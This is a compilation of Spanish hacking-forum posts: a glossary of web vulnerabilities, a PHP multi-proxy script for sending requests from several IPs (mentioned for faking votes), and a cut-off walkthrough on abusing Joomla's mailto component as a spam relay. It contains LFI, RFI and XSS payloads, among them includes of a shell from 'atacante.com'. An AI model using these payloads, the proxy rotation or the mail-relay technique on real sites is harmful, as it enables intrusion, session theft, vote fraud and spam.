Estaba haciendo un sistema en vb6 donde te muestra algunas conexiones tcp y me gustaría implementar una opción que pueda desconectar dicha ip, como podría hacerlo o crear como un tipo de baneo?
por ejemplo agregar una ip a una lista y que esa ip no pueda conectarse al host 

estaba observando unas funciones de un código de vb6 y queria pasarlo a php pero hay cosas que no entiendo bien como por ejemplo esto:

 Chr(Len(pck) Mod 256)

crh  convierte decimales a string y len es el tamaño del string de pck pero mod 256? que hace mod? le da limite o le hace alguna operación aritmética?

Como se ve en su perfil, un trozo de torta con una vela



estáaaaaaaa de cumpleañoooooooosssssss!!!!!!!!!
FELICIDADESSS JODERRR!!!!!!





Y ojala que pasemos del 2012 para que cumplas muchos mas xDDD

Me tardé medio dia completo pero lo terminé, es un script que puede utilizar multitudes de proxys para conectarse a un mismo sitio o los que quieras.
Utiliza Curl asi que debes tenerlo activado... igual pude haberlo hecho en sockets pero quise hacerlo mas rápido.

<?php
/*
ProxyWEB 1.0 by WHK
Nice Multidimensionals Arrays
*/
 
// Prueba de uso [Inicio]
$conecta = array(
 'url' => 'http:// mi servidor local de pruebas',
);
 
echo 'Iniciando ...<br />';
for($cuenta = 1; $cuenta < 5; $cuenta++){
 $conecta['proxy_id'] = $cuenta;
 if(http_proxy($conecta))
  echo 'conexión enviada!<br />';
 else
  echo 'Imposible conectar!<br />';
}
echo 'Terminado!';
// Prueba de uso [Final]
 
/* Proxy */
function http_proxy($array_data){
 /*
 Dimensión del array $array_data
 ---------
  url
  post_data = false
  referer = false
  cookies = false
  user_agent = false
  seguir = false
  return_header = true
  proxy_id = false
  
  proxy_id
  --------
  1 = anonymouse.org
  2 = unblocker.in
  3 = unblocksiteproxy.info
  4 = tunnelcafe.com
  5 = unblockfacebook.mobi
 */
 if(!$array_data['url'])
  return false; /* No hay URL */
 
 if($array_data['proxy_id'] == '1'){
  /* Anonymouse.org */
  $array_data['url'] = 'http://anonymouse.org/cgi-bin/anon-www.cgi/'.$array_data['url'];
  return http_req($array_data);
 }elseif($array_data['proxy_id'] == '2'){
  /* unblocker.in */
  $array_data['proxy_server'] = 'www.femalethick.cn';
  $array_data['metodo_proxy'] = '1';
  return metodo_proxy($array_data);
 }elseif($array_data['proxy_id'] == '3'){
  /* unblocksiteproxy.info */
  $array_data['proxy_server'] = 'www.unblocksiteproxy.info';
  $array_data['metodo_proxy'] = '1';
  return metodo_proxy($array_data);
 }elseif($array_data['proxy_id'] == '4'){
  /* tunnelcafe.com */
  $array_data['proxy_server'] = 'www.tunnelcafe.com';
  $array_data['metodo_proxy'] = '1';
  return metodo_proxy($array_data);
 }elseif($array_data['proxy_id'] == '5'){
  /* unblockfacebook.mobi */
  $array_data['proxy_server'] = 'www.unblockfacebook.mobi';
  $array_data['metodo_proxy'] = '2';
  return metodo_proxy($array_data);
 }
}
 
function metodo_proxy($array_data){
 if($array_data['metodo_proxy'] == '1'){
  /* Obtiene la cookie Anti-HotLink para realizar el Bypass */
  $array_data['url_real'] = $array_data['url'];
  $proxy = array(
   'url' => 'http://'.$array_data['proxy_server'].'/index.php',
   'seguir' => true,
   'return_header' => true
  );
  if(!$cookie = http_req($proxy))
   return false; /* El servidor proxy no responde */
  if(!$cookie = desde_hasta('Cookie: ', '<br', nl2br($cookie)))
   return false; /* No hay cookie de auitentificación */
  if(eregi(';', $cookie)){ /* Separa las variables de las cookies */
   $cookie = explode(';', $cookie);
   $cookie = $cookie[0];
  }
  $array_data['url'] = 'http://'.$array_data['proxy_server'].'/includes/process.php?action=update';
  $array_data['seguir'] = true;
  $array_data['cookies'] = $cookie; /* HotLink Bypass */
  $array_data['post_data'] = 'u='.urlencode($array_data['url_real']).'&allowCookies=on';
  $array_data['referer'] = 'http://'.$array_data['proxy_server'].'/'; /* Anti-Lecher Bypass */
  return http_req($array_data);
 
 }elseif($array_data['metodo_proxy'] == '2'){
  $buffer = http_req(array('url' => 'http://www.unblockfacebook.mobi/index.php'));
  $buffer = desde_hasta('<div id="form">', '</div>', $buffer);
  $buffer = '%0n'.desde_hasta('\'%0n', '%0n\'', $buffer).'%0n';
  $buffer = decode_unblockfacebook($buffer);
  $array_data['url_original'] = $array_data['url'];
  if(!$array_data['url'] = desde_hasta('<form name="login" action="', '" method', $buffer))
   return false; /* No hay URL de formulario o hubo una mala codificación. */
  $array_data['url'] = 'http://www.unblockfacebook.mobi'.$array_data['url'];
  $array_data['post_data'] = 'username='.urlencode($array_data['url_original']).'&r4=+checked&rs=on&fa=&br=on&if=+checked';
  $array_data['seguir'] = true;
  $array_data['referer'] = 'http://www.unblockfacebook.mobi/'; /* Anti-Lecher Bypass */
  return http_req($array_data);
 }
}
 
/* conexión */
function http_req($array_data){
 /* Crea el manipulador con la conexión */
 $handle = curl_init($array_data['url']);
 /* PostData */
 if($array_data['post_data']){
  curl_setopt($handle, CURLOPT_POST, true);
  curl_setopt($handle, CURLOPT_POSTFIELDS, $array_data['post_data']);
 }else{
  curl_setopt($handle, CURLOPT_POST, false);
 }
 /* User-Agent */
 if($array_data['user_agent'])
  curl_setopt($handle, CURLOPT_USERAGENT, $array_data['user_agent']);
 else{
  /* Le hacemos publicidad a GNU */
  curl_setopt($handle, CURLOPT_USERAGENT, 'Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/'.time().' Ubuntu/9.25 (jaunty) Firefox/3.8');
 }
 /* Referencia */  
 if($array_data['referer'])
  curl_setopt($handle, CURLOPT_REFERER, $array_data['referer']);
 /* Retorna contenido siempre */
 curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
 /* Sigue los estados 302 de redireccionamiento */
 if($array_data['seguir'])
  curl_setopt($handle, CURLOPT_FOLLOWLOCATION, true);
 else
  curl_setopt($handle, CURLOPT_FOLLOWLOCATION, false);
 /* Tiempo de espera entre conexión */
 curl_setopt($handle, CURLOPT_TIMEOUT, 100);
 /* Retorna cabezeras del servidor */
 if($array_data['return_header'])
  curl_setopt($handle, CURLOPT_HEADER, true);
 /* Envía Cookies */
 if($array_data['cookies'])
  curl_setopt($handle, CURLOPT_COOKIE, $array_data['cookies']);
 /* Retornos con estados y buffer de respuesta del servidor */
 $array_data['contenido'] = curl_exec($handle);
 $array_data['error'] = curl_error($handle);
 curl_close($handle);
 /* Finaliza el retorno */
 return $array_data['contenido'];
}
 
function desde_hasta($desde, $hasta, $contenido, $cantidad = false, $retornar_todo = false){
 if(eregi($desde ,$contenido)){
  $retorno = explode($desde, $contenido);
  foreach($retorno as $compara){
   $compara = explode($hasta, $compara);
   if($compara = $compara[0])
    $retorna[] = $compara;
   unset($compara);
  }
  if($retornar_todo){
   unset($retorna[0]);
   return $retorna;
  }
  if(is_numeric($cantidad)){
   $retorno = $retorna[$cantidad];
  }else{
   $retorno = $retorna[1];
  }
  return $retorno;
 }else{
  return false;
 }
}
 
function left($buffer, $length){
 return substr($buffer, 0, (int)$length);
}
 
function right($buffer, $length){
 return substr($buffer, (int)(-$length));
}
 
function decode_unblockfacebook($buffer){
 if(strlen($buffer) > 0){
  for($ctr = 0; $ctr < strlen($buffer) ; $ctr++){
   $b = ord($buffer[$ctr]);
   if((($b > 64) && ($b < 78)) || (($b > 96) && ($b < 110))){
    $b = $b + 13;
   }else{
    if((($b > 77) && ($b < 91)) || (($b > 109) && ($b < 123))){
     $b = $b - 13; 
    }
   }
   $t .= chr($b);
  }
 }
 return urldecode($t);
}
?>

Resultado:

4 peticiones desde diferentes ips.
vota por 4 en meneame xD

no puede serr!!!!!

ya encontraba extraño que me dieran a adivinar una palabra de un solo carácter y me sale con undefined como respuesta

quiero mi puntaje devueltaaaaaaa!!!!

¿Como buscar una palabra?
R: en tu explorador vas al menú buscar y pones parte o toda la palabra que desees. Recuerda poner los acentos correspondientes en el caso que sea una palabra en español.

Diccionario informático sobre Bugs y Exploits en nivel WEB V1.0
Diccionario "a prueba de" realizado para que todo ser humano que tenga por lo menos con un ojo bueno y un cerebro pueda entender cada palabra sin tener conocimientos previos relacionados con la seguridad informática.

Nota: Recordar que esto es solo un diccionario de definiciones por lo cual no se mostrarán demasiados detalles porque no es una enciclopedia ni nada por el estilo, para eso ver los enlaces relacionados de cada item.
Para mas información vease:
http://foro.elhacker.net/nivel_web/temas_mas_destacados_fallas_y_explotaciones_a_nivel_web_actualizado_71009-t244090.0.html
Si tienes alguna sugerencia o algo que opinar sobre el diccionario puedes hacerlo desde este enlace:
http://foro.elhacker.net/nivel_web/nuevo_diccionario_de_bugs_y_exploits_en_nivel-t270629.0.html

---

Bug
Bug en español significa bicho y por lo general se refiere a un error de programación donde el software actúa de forma inapropiada o inesperada.
En el caso de sitios WEBs un bug se refiere a una falla en el código que no necesariamente puede ser una vulnerabilidad sino mas bién una reacción inesperada.

Ejemplos de Bugs:

• http://foro.elhacker.net/nivel_web/recopilatorio_de_vulnerabilidades_de_xsssqlinjection-t220843.0.html
• http://milw0rm.com/webapps.php

---

Vulnerabilidad
La palabra no tiene mayor explicación ya que queda claro que es una vulnerabilidad pero lo que si hay que dejar en claro primeramente que un bug puede ser vulnerabilidad como puede que no lo sea, también que algunos le llaman "Feature"´aunque una feature en inglés significa ventaja o característica extra del mismo sistema dando a decir que no es un bug sino que el comportamiento del sistema es normal y así fue diseñado para ventaja del programador externo, visitantes, etc, solo es vulneranilidad cuando no estaba contemplado por el programador. Esto también se aplica en Bugs.
Por lo general un programador que se le pide una explicación por una vulnerabilidad en un sistema propio dice: "this is not a bug, is a feature", aunque también lo dicen las personas que pueden sacarle provecho manualmente o con exploits (exploit no es un xploit, Vease Exploit).

---

Bugtraq
Lugar donde se listan bugs de sistemas informáticos. Antiguamente conocido como listas de correos pero actualmente también pueden leerse en linea sin la necesidad de una suscripción.

Ejemplos de Bugtraq:

• http://seclists.org/bugtraq/
• http://www.securityfocus.com/archive/1
• http://marc.info/?l=bugtraq&r=1&w=2&b=200003

---

Advisory
En español son avisos, por lo tanto si se habla de advisory en el ámbito de la informática por lo general se refiere a un comunicado o declaración de bugs.

Ejemplos de un advisories:

• http://secunia.com/advisories/25043/
• http://support.microsoft.com/kb/972890

---

LFI
Conocido como "Local File Inclusion" o Inclusión de archivo local y se trata de una falla de programación donde se tiene la posibilidad de incluir archivos externos y ejecutarse. Por lo general esto sucede con lenguajes de programación WEB.
Para programadores:
Esto sucede cuando hacemos por ejemplo

<?php include('/home/web/www/'.$_GET['sección'].'.php'); ?>

entonces cuando yo ejecuto test.php?sección=noticias en realidad el include queda de la siguiente forma:

<?php include('/home/web/www/noticias.php'); ?>

¿porqué es una vulnerabilidad?: porque un atacante puede hacer inclusión de un archivo de forma local como por ejemplo esta:
test.php?sección=../../../../../../../etc/passwd%00
(Vease Null Bite Atack) por lo cual quedará de la siguiente forma:

<?php include('/home/web/www/../../../../../../../etc/passwd\0.php'); ?>

entonces el null bite limita el string de inclusión hasta la palabra passwd solamente haciendo incluir de forma local el archivo de passwords de sesiones del sistema (en otros puede ser SAM o shadow), en otros casos el atacante puede inyectar comandos arbitrarios dentro del log de accesos y hacerle una inclusión para su posterior ejecución comprometiendo el servidor.
En otros casos la inclusión no lleva a la ejecución, en ese caso no se trata de un LFI sino de un File Disclosure (Vease file disclosure)

---

RFI
Es igual al LFI (Vease primeramente LFI antes de continuar) con la diferencia de que la inclusión del script puede ser de forma remota, por ejemplo:

<?php include($_GET['sección'].'.php'); ?>

Entonces test.php?sección=votar sería:

<?php include('votar.php'); ?>

Pero como se trata mas bién de una vulnerabilidad devido a que un atacante puede modificar dicha variable y hacer referencia a un archivo externo como por ejemplo test.php?sección=http://www.atacante.com/shell.txt?x=
por lo tanto el script quedaría:

<?php include('http://www.atacante.com/shell.txt?x=.php'); ?>

y como la petición de dicho texto está alojado en un servidor WEB la variable invalida la terminación .php. También existen algunas formas de evadir sistemas de protección donde solo restringen la palabra "http" pero desde otros protocolos también es posible incluyendo filesize() de php como lo es el protocolo "ftp" ya que php lo procesa como archivo sólido y no archivo WEB (Vease Bypass).

---

XSS
Un XSS es una Vulnerabildad WEB llamada "Cross Site Scripting" pero entonces porqué se llama XSS y no CSS?, para no confundir CSS que significa "Cascading Style Sheets" que es un lenguaje de estilo proporcionado para html como por ejemplo "style.css" en el cual va la informacion de estilo html y xhtml.

Normalmente confundido con la palabra "Inyección HTML" debido a que se trata de incorporar un código interpretado dentro de un sitio WEB para que este se ejecute.
Por ejemplo tenemos un chat público donde podemos escribir mensajes y ver como nos pueden leer, imaginemos que podemos escribir el mensaje <h1>hola a todos</h1> entonces si los demás participantes pueden leer tu código HTML sería XSS siempre y cuando este código puede de alguna forma comprometer la seguridad del sitio o de algún usuario, si no entonces no es XSS.

Un ejemplo sería dejar código ‭‬‭‬‭‬‭‬‭‬‭‬‭‬javascript para que el explorador del visitante envíe su cookie de sesión hasta un servidor externo para luego ser recuperado y hacer robo de la sesión.

XSS es una vulnerabilidad antiguamente de "baja" importancia, hoy en dia es de importancia "media" en relación a la seguridad de un sitio WEB aunque este tipo de fallas puede ocacionar nada como tabién comprometer toda una red de servidores dependiendo del sistema y los conocimientos del usuario de Administración.
También mal conocido como "Inyección HTML" ya que un XSS no siempre es generado via código HTML.

Algunos sitios WEBs guardan historiales de sitios webs con este tipo de vulnerabilidad.

Enlaces de ayuda:

• http://xssed.com/archive/author=WHK
• http://es.wikipedia.org/wiki/Cross-site_scripting
• http://noscript.net/

---

XSS Reflejado
(Lease primero la definición de XSS) Es un tipo de vulnerabilidad WEB XSS con la característica de que solamente se visualiza el código inyectado en e sitio web si la modificas en el momento, eso quiere decir que luego de ejecutar el xss intentas ver el mismo sitio no deberías ver el código inyectado.

Enlaces de ayuda:

• http://es.wikipedia.org/wiki/Cross-site_scripting#XSS_Indirecto_.28reflejado.29

---

XSS Persistente
(Lease primero la definición de XSS) Es un tipo de vulnerabilidad WEB XSS con la característica de que cuando haces la inyección en el código este persevera aún saliendo del sitio web, eso quiere decir que yo puedo entrar y dejar un XSS en el sitio web y cualquiera que entre podrá verla sin la necesidad de recibir un ataque indirecto o la necesidad de un tercer involucrado.

Enlaces de ayuda:

• http://es.wikipedia.org/wiki/Cross-site_scripting#XSS_Directo_.28persistente.29

---

CSRF
CSRF son las siglas de la palabra Cross Site Request Forgery y es una falla de programación WEB donde se pueden ejecutar acciones de forma arbitraria.

Por ejemplo supongamos que estamos en un foro y en ese foro hay un botón para salir de tu sesión y ese botón da un enlace hacia http://foro.com/salir , entonces cualquier persona que te redirija hacia ese enlace hará que tu sesión termine de forma arbitraria ya que fue hecho sin tu consentimiento, de esta forma el atacante de ese foro puede crear un post donde tu no podrías responderle ya que al intentar hacerlo el introducirá un enlace de tipo imagen hacia http://foro.com/salir y cuando intentes responder el foro dirá que no tienes una sesión en el foro.

Este tipo de vulnerabilidad se puede solucionar agregando in identificador único a una acción, por ejemplo una serie de carácteres llamados token donde cada usuario tiene su propio token de forma oculta, entonces cuando necesites salir dirá http://foro.com/salir&token=fyr3ry78g y si el atacante no conoce ese token no podra hacer que se ejecute esa acción de forma arbitraria.

Enlaces de ayuda:

• http://es.wikipedia.org/wiki/Cross_Site_Request_Forgery

---

XSRF
Sinónimo de CSRF (Vease CSRF) con la diferencia de anteponer X en ves de C debido a que se atribuye la X a la palabra "Cross" y evitar la confusión que se producía con las siglas XSS (Vease XSS).

---

Null Bite Attack
El carácter nulo se usa en muchas ocasiones. Como el carácter nulo determina el término de un string puede ser utilizado en fallas de programación WEB, por ejemplo algunas funciones de php tales como include() puedes decirle que un string termine en carácter nulo, por ejemplo

<?php include('test/archivo.php%00basuraetcetc'); ?>

Incluirá solamente hasta archivo.php ya que le corté el string en %00, ahora %00 es un carácter nulo en formato urlencode, o sea que puedo pasarlo en una petición GET o POST pero si quisiera testearlo directamente en el archivo tendría que hacer esto:

<?php include('test/archivo.php'."\x00".'basuraetcetc'); ?>

Ahora, esto le puede servir a un atacante para hacer LFI (Local file inclusion).
Supongamos este caso:

<?php include('secciones/'.$_GET['pagina'].'.php'); ?>

Entonces yo podría decir test.php?pagina=contacto y la inclusión quedaría

<?php include('secciones/contacto.php'); ?>

Pero si le pongo un carácter nulo para que corte el string quedaría así:
test.php?archivo=../../../../../../../../../../etc/passwd%00

<?php include('secciones/../../../../../../../../../../etc/passwd%00.php'); ?>

por lo tanto me devolverá el archivo de sesiones de usuarios de ese servidor.

Enlaces de ayuda:

• http://en.wikipedia.org/wiki/Null_character
• http://ha.ckers.org/blog/20060914/php-vulnerable-to-null-byte-injection/
• http://www.webcomparte.com/foro/programacion-en-php/para-que-sirve-un-caracter-nulo/
• http://projects.webappsec.org/Null-Byte-Injection

---

Disclosure
Disclosure es español significa el "Descubrimiento" de algo, pero en el caso de una definición de seguridad WEB se traduce en el descubrimiento de datos de forma arbitraria (Vease Arbitrario), por ejemplo en PHP o JSP si un sistema WEB no tiene una buena programación puede causar que se vean cosas como estas:

aunque este mensaje no nos dice mucho del sitio WEB si lo hace el escape de información ya que nos indica en que lugar está alojado el archivo, en este caso está en "c:\wampp\www\" por lo tanto un atacante podrá saber mejor como realizar un futuro ataque.

Ejemplos de Disclosure:

• http://www.vsantivirus.com/vul-phpbb206.htm
• http://www.insecurity.cl/2009/09/28/full-path-disclosure-en-la-mayoria-de-los-plugins-de-wordpress/

Enlaces de ayuda:

• http://www.acunetix.com/vulnerabilities/Full-path-disclosure.htm
• http://www.owasp.org/index.php/Full_Path_Disclosure

---

Path disclosure
Es el descubrimiento de uno o mas directorios debido a una falla de programación WEB (Vease Disclosure)

---

Full path disclosure
Cuando es Full path disclosure significa que se pueden descubrir todos los directorios del sitio WEB afectado (Vease Path Disclosure).

---

File disclosure
Quiere decir que se pueden descubrir los contenidos de archivos dentro del servidor WEB a diferencia del Path disclosure que solamente puede descubrir directorios (Vease Disclosure).

---

Inyección SQL
Yambién llamado como SQL Inyection y SQLI.
Para poder entender un poco el significado de inyección SQL primeramente debes saber por lo menos que significa SQL (Vease MySQL y MSSQL).
Generalmente una base de datos es un grupo de información guardada en un Servidor y este recibe instrucciones de lo que debe hacer y aquellas instrucciones las da el sistema WEB que en este caso es la página WEB.

Por ejemplo el sitio web WEB le dice al servidor de la base de datos:

Entonces cuando te creas una cuenta donde dice tu nombre puedes ponerle otras instrucciones, por ejemplo en ves de poner "pedro" le pondré "pedro y digame cual es la contraseña del administrador", entonces la consulta que le hace el servidor WEB a la base de datos es esta:

Por lo tanto hacemos consultas arbitrarias.

Para programadores cuando tienes una consulta de este tipo:

SELECT * FROM users WHERE USER = '$user' AND pass = '$pass'

Yo puedo poner de nick lo que sea y en pass pongo
Por lo tanto primero valido la primera query y sin romperla hago un segundo select con union escribiendo la cantidad de columnas a retornar donde el id de usuario es uno o sea por defecto en casi todos los sistemas webs "el administrador".

---

Blind Inyección SQL
Vease primeramente "Inyección SQL".
También conocido como Inyección Ciega o Inyección a Ciegas.
Se trata de una vulnerabilidad en un sistema que puede ser WEB en el cual no ves ningún dato debuelto por dicha inyección, por lo tanto no ves tablas, columnas, nada y se hace sabiendo que se está ejecutando.
Un ejemplo práctico sería una inyección de este tipo:

test.php?id=-1' and substring(@@versión,1,1)='4

En este caso logramos saber la versión de la base de datos MySQL sin que nos debuelva ningún tipo de información pero si podemos ver si se ejecuta o no.

Enlaces de ayuda:

• http://foro.elhacker.net/nivel_web/caso_01_blind_sql_inyection_con_descarga_forzada-t244378.0.html
• http://foro.elhacker.net/hacking_avanzado/gran_tutorial_sobre_inyecciones_sql_en_mysql-t247535.0.html

---

Inyección MSSQL Concateada
Vulnerabilidad de tipo Inyección SQL (Vease inyección SQL) que es posible llevarse a cabo devido a una falla de programación en el servidor de MS ISS (Microsoft Internet Services) la cual consiste en lo siguiente:
Normalmente en Apache esto se interpreta como una sola variable tomando como válida la última y desechando las anteriores, o sea que id vale "2" pero esto no sucede así en ISS:
el servidor interpretará los dos valores y para enviarlos al script final concateará ambas variables, o sea que id será "1,2".
Esta vulnerabilidad puede ser aprobechada para evdadir sistemas de protección concateando strings filtrados o devolviendo valores extras.

---

CMS
Content Management System o en español sistema de administración de contenido.
Son sistemas WEBs dinámicos capaces de gestionar diferentes tipos de contenidos de forma automatizada. Algunos de estos sistemas dinámicos pueden ser:
Simple Machines Forum, Joomla, Moodle, Wordpress, PHP-Nuke, E-107, VBulletín, IPBoard, etc.

Enlaces descriptivos:

• http://www.google.cl/search?hl=es&q=define%3Acms&btnG=Buscar+con+Google&meta=&aq=f&oq=
• http://es.wikipedia.org/wiki/Sistema_de_gesti%C3%B3n_de_contenido

---

Código PHP
Es un lenguaje de programación que se utiliza para construir sitios webs automatizados e interactivos.
Antiguamente era utilizado CGI como lenguaje común basado en Perl que interactúa con servidores WEB.
Hoy los lenguajes mas utilizados para sitios webs dinámicos son PHP, .NET (Framework de Microsoft), CGI/Perl y Python pero entre todos ellos el mas utilizado es PHP.

Para crear nuestri primer ejemplo en php se necesita un servidor (no el físico) y el mas utilizado es "Apache" ya que php solamente es un interprete de código que puede ser utilizado en sitios webs como también via consola directamente como interprete scripting.
Apache contiene una extensión que hace interactuar PHP con el mismo, de esta forma nosotros podemos decir http://servidor/archivo.extension?variable1=valor1 y apache interpretará esto y le enviará a PHP los valores de variables globales tales como $_GET y $_POST.

Enlaces relacionados:

• http://php.net/
• http://es.wikipedia.org/wiki/PHP
• http://tutorialphp.net/
• http://www.google.cl/search?hl=es&q=manual+php
• http://www.google.cl/search?hl=es&q=define%3Aphp

---

Cookies
Antiguamente malconocidos como SpyWares porque se pensaba que solo servían para espiar o robar datos de una pc.

Una cookie es donde el servidor puede guardar información de cualquier tipo en tu explorador.

Algunos sitios webs utilizan esta información para saber quien eres y poder identificarte al momento de crear una sesión.

Las cookies las establece el servidor y el explorador solamente las administra y le entrega a cada sitio las cookies que le correspondan unicamente.

Por ejemplo si yo engro a foro.elhacker.net e ingreso con mi cuenta de usuario este creará una cookie en mi explorador que almacenará mis datos de acceso, de esta forma el servidor sabrá que yo soy WHK y no un visitante cualquiera, ahora esta cookie solamente se entregará al servidor de elhacker.net pero si yo voy a google.com no mostrará esta cookie ya que cada cookie tiene su servidor y ningún servidor puede obtener la cookie de otro, esto es privacidad de datos y seguridad.

Antiguamente las cookies en Internet explorer se basaban en una cookie por archivo txt, ahora en Firefox todas las cookies se almacenan en un mismo archivo sin perder su funcionalidad ya que el mismo firefox se encarga de administrarlas.

Si quieres saber cuales son tus cookies en un sitio web ve a el y pon esto en tu barra del explorador:
javascript:alert(document.cookie);

En Firefox tienes complementos que te permiten modificar dichas cookies y probar la seguridad de tu sitio web, por ejemplo Add N Edit Cookies
https://addons.mozilla.org/es-ES/firefox/addon/573

Actualmente para Internet explorer no se conoce ninguno debido a que sus complementos son de código cerrado.

Enlaces relacionados:

• http://es.wikipedia.org/wiki/Cookie
• http://www.geocities.com/SiliconValley/Way/4302/cookies.html

---

Código arbitrário
O tambien "Remote Execution".
Se refiere a la frase completa: Acción sobre el código de forma arbitrária y significa que se realiza una acción como puede ser una edición, ejecución, etc. De código significa que esto se efectúa sobre el código de programación (vease programación). Arbitrario significa que puede realizarse sin el consentimiento de la persona y también sin que se de cuenta.
Cuando se dice que es de forma remota significa que un atacante o individuo puede causar esta acción desde fuera de su propia red de conexión. Un ejemplo práctico sería yo como atacante hago que ejecutes una acción en tu pc, como es a distancia es remoto, en caso contrario sería de forma local.

Enlaces relacionados:

• http://foro.elhacker.net/nivel_web/multiples_vulnerabilidades_en_sqliteadmin_120-t260867.0.html

---

0-Day
Conocido también como "Zero-Day" o "Dia Cero"
Vulnerabilidad descubiera por primera ves sin tener ninguna solución oficial por parte del creador del sistema afectado. Por lo general un 0-day es una vulnerabilidad descubierta y publicada en el mismo dia aunque no siempre sucede.

Enlaces relacionados:

• http://en.wikipedia.org/wiki/Zero_day
• http://www.zdnet.com/
• http://www.vsantivirus.com/06-12-05.htm

---

Desface
Conocido también como "Deface" pero mal escrito.
Se le dice de esta forma al ataque hacia un sitio web el cual consiste en la modificación deliverada de información probocado por una vulnerabilidad, bug, etc. Esta modificación es permanente ya que en caso contrario es declarado simplemente un XSS (Vease "XSS").

Enlaces de ejemplos:

• http://zone-h.org/archive/special=1

---

Desfacing
Conocido también como "Defacing" pero mal escrito.
Acción de desfacear. Vease "Desface".

---

Bypass
Se le dice Bypass a un método que puede eludir algún tipo de sistema de protección, por ejemplo cuando se dice "Hacer Bypass al filtro anti XSS" Significa que hubo un sistema que estaba preparado para resistir ataques de tipo XSS pero por algún motivo devido a problemas de seguridad y/o de programación pudo ser eludido haciendo cuentas como que el sistema de protección no existiera.

Ejemplos prácticos:
Sistema de protección anti-XSS dice (Vease XSS) -->

<?php $palabra = str_replace('<script>','',$_GET['palabra']); echo $palabra; ?>

El atacante hace un Bypass -->
test.php?palabra=<sc<script>ript>alert(document.cookie);</script>
El sistema de protección borra la palabra de color rojo --->
<sc<script>ript>alert(document.cookie);</script>
Queda así -->
<script>alert(document.cookie);</script>

Son formas de eludir un sistema de protección para provocar una vulnerabilidad en el sistema independiente si pueda ser aprobechado o no.

Otro ejemplo:
Sistema de protección anti-RFI (Vease RFI):

<?php
if(eregi('http://', $_GET['path'])){
 die('Esto es un ataque'); 
}else{
 include($_GET['path'].'.php');
}
?>

El atacante dice:
test.php?path=ftp://atacante.com/shell.txt?x=
Entonces el sistema hace un include de esta forma:
include('http://ftp://atacante.com/shell.txt?x=.php');
Pero como include realiza las conexiones via ftp y ftp necesita de un usuario y contraseña se lo deshabilitamos o habilitamos ftp anónimo o usamos un servidor local o si conoces el protocolo ftp puedes hacerlo hasta con netcat o utilizando sockets poniendolos a escucha para el que sepa programar.

Enlaces relacionados:

• http://www.milw0rm.com/exploits/9399
• http://www.securityfocus.com/bid/9658/discuss
• http://seclists.org/bugtraq/2005/Dec/0158.html

---

Exploit
Muchas veces mal confundido con "Xploit".
Un Xploit es un sistema que envía correos a otras personas para robarles sus datos personales engañandolos pidiendoles su propia contraseña.
Un exploit es sun Software, Script o cualquier cosa que pueda aprovechar una vulnerabilidad de cualquier tipo de sistema para provecho de algo o alguien.

Ejemplos de Exploits:

• http://milw0rm.com/exploits/9394
• http://www.packetstormsecurity.org/0908-exploits/blazedvd-overflow.txt

---

PoC
Significa en ingles "Proof Of Concept" o Prueba de concepto, el cual es muy similar a un Exploit (Vease Exploit antes de continuar) pero con la diferencia que un exploit está diseñado para aprovechar las vulnerabilidades en beneficio de algo o alguien y el PoC solo demuestra que realmente se puede comprobar que la vulnerabilidad o Bug existe.

Ejemplos de PoCs:

• http://milw0rm.com/exploits/9431
• http://seclists.org/bugtraq/2009/Aug/0016.html
• http://seclists.org/bugtraq/2009/Aug/0107.html

---

MySQL
Sistema de base de datos de código libre y gratuito con soporte en tanto para Linux como también para MS Windows.
Es un sistema que es capaz de gestionar información almacenada de forma interna en archivos y directorios, su organización es su fuerte y puede ser utilizado en sistemas webs como en sistemas ejecutables.
Por ejemplo si tengo un sitio web de música puedo administrar el contenido de todos mis tracks ordenados por asutor, fecha, hacer busquedas, eliminar, crear, etc.
Este sistema es utilizado comunmente en el lenguaje web llamado PHP que puede servir para la administración del contenido del sitio.

Enlaces relacionados:

• http://foro.elhacker.net/php/scripts_phpmysql-t48315.0.html
• http://es.wikipedia.org/wiki/MySQL
• http://www.mysql.com/

---

MSSQL
Sistema de base de datos utilizado en servidores de MS Windows similar a MySQL (Vease MySQL) pero con una sintaxis de programación similar aunque no igual.
La diferencia mas notable al momento de observar un sitio web vulnerable a inyección SQL (Vease Inyección SQL) es que en MSSQL puedes ejecutar comandos directamente sobre la shell del Sistema Operativo haciendolo mas vulnerable a una intrusión por escalación de privilegios.

Enlaces relacionados:

• http://www.microsoft.com/sqlserver/

---

Arbitrario
Si se dice que ocurrió una acción de forma arbitraria quiere decir que fue ejecutado sin el consentimiento de la persona que se afectó.

Bueno, ya hace bastante tiempo habia hecho un post detallando varias fallas de joomla de las cuales casi todas fueron reparadas.

Con el tiempo le envié un correo al soporte para que pudieran reparar otras nuevas fallas pero nunca respondieron y nunca los repararon tampoco jajajaja, será que les digo las cosas y lo toman a la ligera no se.

La otra ves publiqué el xss en el buscador y no lo parcharon hasta que publiqué un video de como subir una shell c99 desde ese xss, entonces ahi si lo repararon.

Ahora como piensan que estos bugs no son àra nada comprometedores les mostraré como crear un software para utilizar cualquier sitio web con joomla como servidor de correos masivos pero ojo que no publicaré ningún software hecho para evitar que cualquiera haga de las suyas ya que causa un desmadre al servidor.

Detalles técnicos
La falla está en el componente "MailTo" alias el "com_mailto".
No se si han visto que en algunos sitios webs que funcionan con joomla tienen tres íconos al lado del encabezado del mensaje de la portada... uno que es para imprimir, exportar en pdf y otro para enviar el tema por correo a un amigo como tipo de recomendación.
El problema esque este componente no exige captcha (imagen de verificación) por lo cual una automatización sería técnicamente posible asi que manos a la obra...

Primero que nada cuando enviamos un mail nos encontramos con la siguiente cabezera:

Acá podemos ver muchas cosas que son importantes y que le sirve a joomla para verificar que no seamos un bot.

1. Primero podemos ver el referer, asi que hay que tomarlo en cuenta al momento de enviar la petición, luego vemos que dentro del referer hay una serie de carácteres bién largo justo donde dice "link"... ese valor es la url que se enviará por correo diciendo a tu amgo que le haga click porque yo se la recomendé pero está cifrada en base64.

2. Ahora vemos una cookie con doble hash eso significa que tanto el valor como la variable son hashes aleatorios intentando entre comillas evadir una automatización ya que supuestamente el nombre de la cookie va al azar asi que "pienso" que se habrán roto la cabeza pensando que una cookie al azar podría evitar la captura del mismo limitando al usuario a utilizar solamente el explorador, pues bién... la capturamos y la utilizamos asi que ya sabemos que se necesita el referer, el link en base64 y la cookie con doble hash.

3. Vemos un token de verificación en la variable post y al igual que la cookie este es un hash al azar pero no es su contenido sinó en su nombre y de valor tiene un "1":
